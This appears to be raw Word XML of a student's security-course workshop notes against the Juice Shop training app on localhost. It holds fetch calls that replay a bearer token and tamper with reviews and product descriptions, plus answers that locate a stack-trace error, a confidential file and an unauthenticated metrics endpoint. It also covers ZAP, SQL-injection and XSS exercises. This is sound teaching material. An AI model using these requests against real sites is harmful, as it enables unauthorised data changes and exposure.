    <w:p w14:paraId="26A64069" w14:textId="77777777" w:rsidR="007317BB" w:rsidRDefault="007317BB" w:rsidP="007317BB">
      <w:r>
        <w:t>data.append('file', input.files[0])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5301C606" w14:textId="77777777" w:rsidR="007317BB" w:rsidRDefault="007317BB" w:rsidP="007317BB">
      <w:r>
        <w:t>fetch('/file-upload', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0616B1C5" w14:textId="77777777" w:rsidR="007317BB" w:rsidRDefault="007317BB" w:rsidP="007317BB">
      <w:r>
        <w:t xml:space="preserve"> method: 'POST',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAE8106" w14:textId="77777777" w:rsidR="007317BB" w:rsidRDefault="007317BB" w:rsidP="007317BB">
      <w:r>
        <w:t xml:space="preserve"> body: data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54988E55" w14:textId="77777777" w:rsidR="007317BB" w:rsidRDefault="007317BB" w:rsidP="007317BB">
      <w:r>
        <w:t xml:space="preserve"> headers: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9933D5" w14:textId="77777777" w:rsidR="007317BB" w:rsidRDefault="007317BB" w:rsidP="007317BB">
      <w:r>
        <w:t xml:space="preserve"> 'Authorization': 'Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MiwidXNlcm5hbWUiOiIiLCJlbWFpbCI6ImppbUBqdWljZS1zaC5vcCIsInBhc3N3b3JkIjoiZTU0MWNhN2VjZjcyYjhkMTI4Nj</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q3NGZjNjEzZTVlNDUiLCJyb2xlIjoiY3VzdG9tZXIiLCJkZWx1eGVUb2tlbiI6IiIsImxhc3RMb2dpbklwIjoiIiwicHJvZmlsZUltYWdlIjoiYXNzZXRzL3B1YmxpYy9pbWFnZXMvdXBsb2Fkcy9kZWZhdWx0LnN2ZyIsInRvdHBTZWNyZXQiOiIiLCJpc0FjdGl2ZSI6dHJ1ZSwiY3JlYXRlZEF0IjoiMjAyMy0wMi0wNiAwMzoxNDo1Mi4xOTIgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAyMy0wMi0wNiAwMzoxNDo1Mi4xOTIgKzAwOjAwIiwiZGVsZXRlZEF0IjpudWxsfSwiaWF0IjoxNjc1NjUzNTU3LCJleHAiOjE2NzU2NzE1NTd9.ZOWU79exm6IpgviKfWftA0DOVq_4zQEx7KkGgGMy32foy9BdsYNrc4qEYz3I47sW3_9agV2QZxdNhwYvGVujGN5dt0pOF6c_7mZeL5aj_8smsIDRuZqOwCMdbiQH6k5QXKUaIr2ukZGUkRKA4M64-F_O-D832rR2MiXKpMMig1k',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F66743B" w14:textId="77777777" w:rsidR="007317BB" w:rsidRDefault="007317BB" w:rsidP="007317BB">
      <w:r>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5885CD08" w14:textId="77777777" w:rsidR="007317BB" w:rsidRDefault="007317BB" w:rsidP="007317BB">
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219BA62B" w14:textId="20177E54" w:rsidR="00FA1547" w:rsidRDefault="007317BB" w:rsidP="007317BB">
      <w:r>
        <w:t>.then(console.log)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432A6A9C" w14:textId="5048986A" w:rsidR="007317BB" w:rsidRDefault="00095186" w:rsidP="00095186">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Workshop 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C93E117" w14:textId="3D74F97A" w:rsidR="00095186" w:rsidRDefault="00095186" w:rsidP="00095186">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>fetch('http://localhost:3000//rest/products/1/reviews', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102F0A52" w14:textId="77777777" w:rsidR="00095186" w:rsidRDefault="00095186" w:rsidP="00095186">
      <w:r>
        <w:t xml:space="preserve"> method: 'PUT',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ABB2E5" w14:textId="77777777" w:rsidR="00095186" w:rsidRDefault="00095186" w:rsidP="00095186">
      <w:r>
        <w:t xml:space="preserve"> body: JSON.stringify({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FAE37F" w14:textId="77777777" w:rsidR="00095186" w:rsidRDefault="00095186" w:rsidP="00095186">
      <w:r>
        <w:t xml:space="preserve"> "author":"im@juice-sh.op",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F62C9F" w14:textId="77777777" w:rsidR="00095186" w:rsidRDefault="00095186" w:rsidP="00095186">
      <w:r>
        <w:t xml:space="preserve"> "message":"trying"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161A8D0E" w14:textId="77777777" w:rsidR="00095186" w:rsidRDefault="00095186" w:rsidP="00095186">
      <w:r>
        <w:t xml:space="preserve"> }),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A21BE5" w14:textId="77777777" w:rsidR="00095186" w:rsidRDefault="00095186" w:rsidP="00095186">
      <w:r>
        <w:t xml:space="preserve"> headers: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D14D072" w14:textId="77777777" w:rsidR="00095186" w:rsidRDefault="00095186" w:rsidP="00095186">
      <w:r>
        <w:t xml:space="preserve"> 'Content-type': 'application/json; charset=UTF-8'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328D7E5B" w14:textId="77777777" w:rsidR="00095186" w:rsidRDefault="00095186" w:rsidP="00095186">
      <w:r>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793533D5" w14:textId="77777777" w:rsidR="00095186" w:rsidRDefault="00095186" w:rsidP="00095186">
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2A979A" w14:textId="09127D3A" w:rsidR="000E1AAB" w:rsidRDefault="00095186" w:rsidP="00095186">
      <w:r>
        <w:t>.then(console.log)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C36391A" w14:textId="592999BD" w:rsidR="006F47EF" w:rsidRDefault="00603215" w:rsidP="00603215">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ws</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EA49C5" w14:textId="71780CB2" w:rsidR="00603215" w:rsidRDefault="00000000" w:rsidP="00603215">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00DF66EE" w:rsidRPr="00752948">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:3000/rest/products/search?q=apple%20pomace</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2E861A31" w14:textId="77777777" w:rsidR="00DF66EE" w:rsidRDefault="00DF66EE" w:rsidP="00DF66EE">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>fetch('http://localhost:3000/api/Products/24', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A78DAF" w14:textId="77777777" w:rsidR="00DF66EE" w:rsidRDefault="00DF66EE" w:rsidP="00DF66EE">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> method: 'PUT',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF36224" w14:textId="77777777" w:rsidR="00DF66EE" w:rsidRDefault="00DF66EE" w:rsidP="00DF66EE">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> body: JSON.stringify({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2308EAAD" w14:textId="380B41B2" w:rsidR="00DF66EE" w:rsidRDefault="00DF66EE" w:rsidP="00DF66EE">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> "description": </w:t>
      </w:r>
      <w:r w:rsidR="009B145C" w:rsidRPr="009B145C">
        <w:t xml:space="preserve">Finest pressings of apples. Allergy disclaimer: Might contain traces of worms. Can be </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;a href=\"https://www.csc.ncsu.edu/\" target=\"_blank\"&gt;</w:t>
      </w:r>
      <w:r w:rsidR="002A5D9E" w:rsidRPr="002A5D9E">
        <w:t xml:space="preserve"> sent back to us </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00765178">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00765178" w:rsidRPr="00765178">
        <w:t>for recycling.</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281FC265" w14:textId="77777777" w:rsidR="00DF66EE" w:rsidRDefault="00DF66EE" w:rsidP="00DF66EE">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> }),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65716479" w14:textId="77777777" w:rsidR="00DF66EE" w:rsidRDefault="00DF66EE" w:rsidP="00DF66EE">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> headers: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A28503F" w14:textId="77777777" w:rsidR="00DF66EE" w:rsidRDefault="00DF66EE" w:rsidP="00DF66EE">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 'Content-type': 'application/json; charset=UTF-8'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079B5602" w14:textId="77777777" w:rsidR="00DF66EE" w:rsidRDefault="00DF66EE" w:rsidP="00DF66EE">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3F4B63" w14:textId="77777777" w:rsidR="00DF66EE" w:rsidRDefault="00DF66EE" w:rsidP="00DF66EE">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703D3E0C" w14:textId="303C0BCD" w:rsidR="00DF66EE" w:rsidRDefault="00DF66EE" w:rsidP="00DF66EE">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>.then(console.log)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526E4493" w14:textId="77777777" w:rsidR="006704E6" w:rsidRDefault="006704E6" w:rsidP="00DF66EE">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01E0B256" w14:textId="54AD88E1" w:rsidR="006704E6" w:rsidRDefault="006704E6" w:rsidP="006704E6">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Workshop -6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B70EE0" w14:textId="1B0C5072" w:rsidR="006704E6" w:rsidRDefault="006704E6" w:rsidP="006704E6">
      <w:r>
        <w:t xml:space="preserve">Q1. </w:t>
      </w:r>
      <w:r w:rsidRPr="006704E6">
        <w:t>Find some action or submit a request (somewhere other than through the ftp access point) in the web application that causes an error message with a full stack trace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FA6110" w14:textId="16B41396" w:rsidR="004D2EAE" w:rsidRDefault="004D2EAE" w:rsidP="004D2EAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004D2EAE">
        <w:t>http://localhost:3000/rest/soha</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AA5AA2" w14:textId="01104BA4" w:rsidR="006704E6" w:rsidRDefault="00734CFD" w:rsidP="006704E6">
      <w:r>
        <w:t xml:space="preserve">Q2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00734CFD">
        <w:t>Find a document that contains confidential information (*the document should include the text "Confidential" or "Do not redistribute").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECE7E74" w14:textId="52812E01" w:rsidR="000D4551" w:rsidRDefault="00FB65B6" w:rsidP="000D4551">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB65B6">
        <w:t>http://localhost:3000/ftp/acquisitions.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FF5A3B" w14:textId="4F6E0200" w:rsidR="00FB65B6" w:rsidRDefault="000B43C2" w:rsidP="00FB65B6">
      <w:r>
        <w:t xml:space="preserve">Q3. </w:t>
      </w:r>
      <w:r w:rsidRPr="000B43C2">
        <w:t>Find an endpoint that exposes sensitive information when an authentication header is not included as part of the request. Hints: Look back at prior workshops or consider monitoring metrics for the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260DB1DB" w14:textId="735AB873" w:rsidR="004D2EAE" w:rsidRDefault="00000000" w:rsidP="004D2EAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="003812D4" w:rsidRPr="00E66A46">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:3000/metrics</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20BFE299" w14:textId="77777777" w:rsidR="003812D4" w:rsidRDefault="003812D4" w:rsidP="003812D4"/>
    <w:p w14:paraId="1D290813" w14:textId="14DDA662" w:rsidR="003812D4" w:rsidRDefault="00144C23" w:rsidP="00464F82">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Workshop-7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6660C5E1" w14:textId="1A22BBB6" w:rsidR="00144C23" w:rsidRDefault="00144C23" w:rsidP="003812D4">
      <w:r>
        <w:t xml:space="preserve">Q1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00144C23">
        <w:t>Upload a screenshot that shows a summary of alert categories/results from the automated ZAP scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7686F6B2" w14:textId="7BEBA230" w:rsidR="00F4131D" w:rsidRDefault="00F4131D" w:rsidP="003812D4">
      <w:r>
        <w:t>[DONE]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D33640" w14:textId="77777777" w:rsidR="0023186C" w:rsidRDefault="0023186C" w:rsidP="003812D4"/>
    <w:p w14:paraId="1A14B14D" w14:textId="61BA6A01" w:rsidR="00144C23" w:rsidRDefault="00144C23" w:rsidP="003812D4">
      <w:r>
        <w:t xml:space="preserve">Q2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00144C23">
        <w:t>From the report output, select an alert type/category (other than SQL Injection) that you find interesting.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518912BD" w14:textId="3C168432" w:rsidR="00144C23" w:rsidRDefault="00144C23" w:rsidP="00144C23">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q2.1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00144C23">
        <w:t>In 3-4 sentences, briefly describe why you think the alert is a false positive or an actual concern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCD75BB" w14:textId="37B74C27" w:rsidR="0023186C" w:rsidRDefault="00D7267E" w:rsidP="0023186C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cross-Domain Misconfiguration: </w:t>
      </w:r>
      <w:r w:rsidR="002E639B">
        <w:t>actual concern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFEBB68" w14:textId="0DAC269F" w:rsidR="00144C23" w:rsidRDefault="00144C23" w:rsidP="00144C23">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Q2.2:</w:t>
      </w:r>
      <w:r w:rsidR="00632589">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00632589" w:rsidRPr="00632589">
        <w:t>In 3-4 sentences, briefly describe how the software developers could mitigate the threat associated with the vulnerability indicated in the alert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103866DF" w14:textId="06A156FB" w:rsidR="00632589" w:rsidRDefault="00632589" w:rsidP="00632589">
      <w:r>
        <w:t xml:space="preserve">Q3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00632589">
        <w:t xml:space="preserve">Use ZAP to find an endpoint other than login that is susceptible to SQL injection or cross-site scripting. NOTE: unlike the example with SQL Injection where a response of OK indicated an attack was </w:t>
      </w:r>
      <w:r w:rsidRPr="00632589">
        <w:lastRenderedPageBreak/>
        <w:t>most likely successful, you will have to manually try the cross-site scripting payloads that have a response of OK since the payload text may have been submitted successfully but not executed as a control instruction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6357A907" w14:textId="238C2BB2" w:rsidR="00632589" w:rsidRDefault="00632589" w:rsidP="009636A3">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q3.1: </w:t>
      </w:r>
      <w:r w:rsidR="009636A3" w:rsidRPr="009636A3">
        <w:t>List the steps that need to be performed for to check whether the attack is successful or not. If you were not able to locate a vulnerable endpoint, then list 5 different endpoints that you manually checked based on the ZAP results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04213DC1" w14:textId="43B40AD4" w:rsidR="00393B56" w:rsidRDefault="00393B56" w:rsidP="009636A3">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Complaint forged?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752CAA79" w14:textId="77777777" w:rsidR="005A1E1A" w:rsidRDefault="009636A3" w:rsidP="005A1E1A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q3.2: </w:t>
      </w:r>
      <w:r w:rsidR="005A1E1A">
        <w:t>Upload images that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D94E62F" w14:textId="77777777" w:rsidR="005A1E1A" w:rsidRDefault="005A1E1A" w:rsidP="005A1E1A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>(1) Show the alert payload in ZAP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1E8F34" w14:textId="644F6739" w:rsidR="009636A3" w:rsidRDefault="005A1E1A" w:rsidP="005A1E1A">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>(2) Show a screenshot of the successful attack in the web application.  If you were not able to locate a vulnerable endpoint, then provide one or more screenshot(s) to indicate what happened when you manually tried the payload in the webapp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE04901" w14:textId="2CB36CD0" w:rsidR="005A1E1A" w:rsidRDefault="005A1E1A" w:rsidP="005A1E1A">
      <w:r>
        <w:t xml:space="preserve">Q.4: </w:t>
      </w:r>
      <w:r w:rsidRPr="005A1E1A">
        <w:t>Try fuzzing fields that were previously identified as vulnerable to SQL injection (other than the login module) or cross-site scripting in previous labs. Did the provided payloads in ZAP identify the vulnerabilities? If so, give an example payload that was successful. It not, suggest a reason why the payloads may not have been successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3A834E" w14:textId="7581C35D" w:rsidR="005A1E1A" w:rsidRDefault="005A1E1A" w:rsidP="00C04D06">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Q.</w:t>
      </w:r>
      <w:r w:rsidR="00C04D06">
        <w:t>4.1</w:t>
      </w:r>
      <w:r w:rsidR="007A4418">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="007A4418" w:rsidRPr="007A4418">
        <w:t>In 3-4 sentences, briefly describe (in your own words) the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB3C7A8" w14:textId="3A763737" w:rsidR="00C04D06" w:rsidRDefault="00C04D06" w:rsidP="00C04D06">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q4.2: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C04D06">
        <w:t>In 3-4 sentences, briefly describe the potential impact to the web application if the vulnerability were exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33488E17" w14:textId="4D8360F8" w:rsidR="00C04D06" w:rsidRDefault="00C04D06" w:rsidP="00C04D06">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q4.3: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C04D06">
        <w:t>In 2-3 sentences, briefly describe how the security objectives are threatened by this vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639790B3" w14:textId="70FD98DC" w:rsidR="00C04D06" w:rsidRDefault="00C04D06" w:rsidP="00C04D06">
      <w:r>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidR="009774BC">
        <w:t xml:space="preserve">5: </w:t>
      </w:r>
      <w:r w:rsidR="009774BC" w:rsidRPr="009774BC">
        <w:t>From the report output, select a different vulnerability (from the previous question) that you find interesting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BDEF3D" w14:textId="4D858E52" w:rsidR="009774BC" w:rsidRDefault="009774BC" w:rsidP="00C04D06">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Q5.1: </w:t>
      </w:r>
      <w:r w:rsidRPr="009774BC">
        <w:t>In 3-4 sentences, briefly describe (in your own words) the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094245A3" w14:textId="676513FB" w:rsidR="009774BC" w:rsidRDefault="009774BC" w:rsidP="00EF542E">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q5.2: </w:t>
      </w:r>
      <w:r w:rsidR="00EF542E" w:rsidRPr="00EF542E">
        <w:t>In 3-4 sentences, briefly describe the potential impact to the web application if the vulnerability were exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F089FD" w14:textId="7B36697B" w:rsidR="00EF542E" w:rsidRDefault="00EF542E" w:rsidP="00EF542E">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Q5.3: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF542E">
        <w:t>In 2-3 sentences, briefly describe how the security objectives are threatened by this vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465EB9FC" w14:textId="77777777" w:rsidR="00C04D06" w:rsidRDefault="00C04D06" w:rsidP="00C04D06">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B666606" w14:textId="77777777" w:rsidR="007A4418" w:rsidRPr="00144C23" w:rsidRDefault="007A4418" w:rsidP="005A1E1A"/>
    <w:sectPr w:rsidR="007A4418" w:rsidRPr="00144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8B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="02806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E5C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1882A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D4E92"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7DEC56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20719"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F7587A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31C25"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E466A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26A4A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7DD6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332D1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2BFA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46AE9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF104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00C8D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AFD060E8"/>
    <w:lvl w:ilvl="0" w:tplc="40D6D4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140291"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF6A6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12C4B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0DE8B8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D4172"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6966E6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6400FB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="99FCF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629A7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F4723E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0553D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B34E6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697819">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="945699583">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="107285439">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="552431115">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1913007741">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="244537591">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2051570533">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1340425176">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1640109414">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1070809045">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="630599439">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1526096155">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1782334544">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="204803050">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1877692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CC"/>
    <w:rsid w:val="00005682"/>
    <w:rsid w:val="0002400E"/>
    <w:rsid w:val="00027603"/>
    <w:rsid w:val="00037995"/>
    <w:rsid w:val="00050CC7"/>
    <w:rsid w:val="00070602"/>
    <w:rsid w:val="00095186"/>
    <w:rsid w:val="000B43C2"/>
    <w:rsid w:val="000C5400"/>
    <w:rsid w:val="000D4551"/>
    <w:rsid w:val="000E1AAB"/>
    <w:rsid w:val="0011514C"/>
    <w:rsid w:val="00144C23"/>
    <w:rsid w:val="00167C64"/>
    <w:rsid w:val="001C22AF"/>
    <w:rsid w:val="001D2AF4"/>
    <w:rsid w:val="00212BDC"/>
    <w:rsid w:val="0023186C"/>
    <w:rsid w:val="00241585"/>
    <w:rsid w:val="00242712"/>
    <w:rsid w:val="00246DD9"/>
    <w:rsid w:val="00253E9F"/>
    <w:rsid w:val="002600F4"/>
    <w:rsid w:val="002A5D9E"/>
    <w:rsid w:val="002E639B"/>
    <w:rsid w:val="00347BB4"/>
    <w:rsid w:val="00350CB1"/>
    <w:rsid w:val="0037139D"/>
    <w:rsid w:val="003812D4"/>
    <w:rsid w:val="00393B56"/>
    <w:rsid w:val="003A4441"/>
    <w:rsid w:val="003C071F"/>
    <w:rsid w:val="003D6DC1"/>
    <w:rsid w:val="003D7932"/>
    <w:rsid w:val="004103EB"/>
    <w:rsid w:val="00410F3E"/>
    <w:rsid w:val="00454A25"/>
    <w:rsid w:val="00464F82"/>
    <w:rsid w:val="00474289"/>
    <w:rsid w:val="004C1955"/>
    <w:rsid w:val="004D2EAE"/>
    <w:rsid w:val="004E0842"/>
    <w:rsid w:val="00511F44"/>
    <w:rsid w:val="005335B5"/>
    <w:rsid w:val="00563F5B"/>
    <w:rsid w:val="00595380"/>
    <w:rsid w:val="005A1E1A"/>
    <w:rsid w:val="005C7381"/>
    <w:rsid w:val="005E027B"/>
    <w:rsid w:val="00603215"/>
    <w:rsid w:val="00632589"/>
    <w:rsid w:val="00653518"/>
    <w:rsid w:val="00654ABC"/>
    <w:rsid w:val="00657477"/>
    <w:rsid w:val="006704E6"/>
    <w:rsid w:val="006811B7"/>
